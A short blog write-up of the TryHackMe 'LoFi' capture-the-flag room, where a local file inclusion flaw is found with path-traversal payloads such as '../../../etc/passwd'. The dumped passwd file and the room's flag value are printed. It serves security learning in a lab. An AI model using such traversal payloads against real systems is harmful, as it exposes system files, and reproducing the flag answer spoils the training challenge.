Post

TryHackMe - LoFi

Posted Updated
By cyberpunk.d31ty
1 min read
TryHackMe - LoFi

Lo-Fi

Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!

About

Want to hear some lo-fi beats, to relax or study to? We’ve got you covered! 

Access this challenge by deploying both the vulnerable machine by pressing the green “Start Machine” button located within this task, and the TryHackMe AttackBox by pressing the  “Start AttackBox” button located at the top-right of the page.

Navigate to the following URL using the AttackBox: https://MACHINE_IP and find the flag in the root of the filesystem.

Check out similar content on TryHackMe:

Note: The web page does load some elements from external sources. However, they do not interfere with the completion of the room.

Enumeration

As I had some basic knowledge on LFI, as soon I got the IP, I tried the payload - ../etc/passwd

I usually try to brute-force it for some time, this time I succeeded at my 3rd try - ../../../etc/passwd and got the output.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh

So I understood there is only one user with /bin/bash

So I tried to read the flag.txt using the command - ../../../flag.txt - And surprisingly I got the flag.

Flag = flag{e4478e0eab69bd642b8238765dcb7d18}

Most cases LFI vulnerability leads to RCE, even this machine we could have even did it the same and could have escalate our privileges to root. But this room is just limited with the flag. We can still try for our curiosity! Lemme do that some other time. ;)

Thanks for reading this easy blog!

THM
THM LFI
This post is licensed under CC BY 4.0 by the author.

Trending Tags

PortSwigger THM HTB SQLi CSRF LFI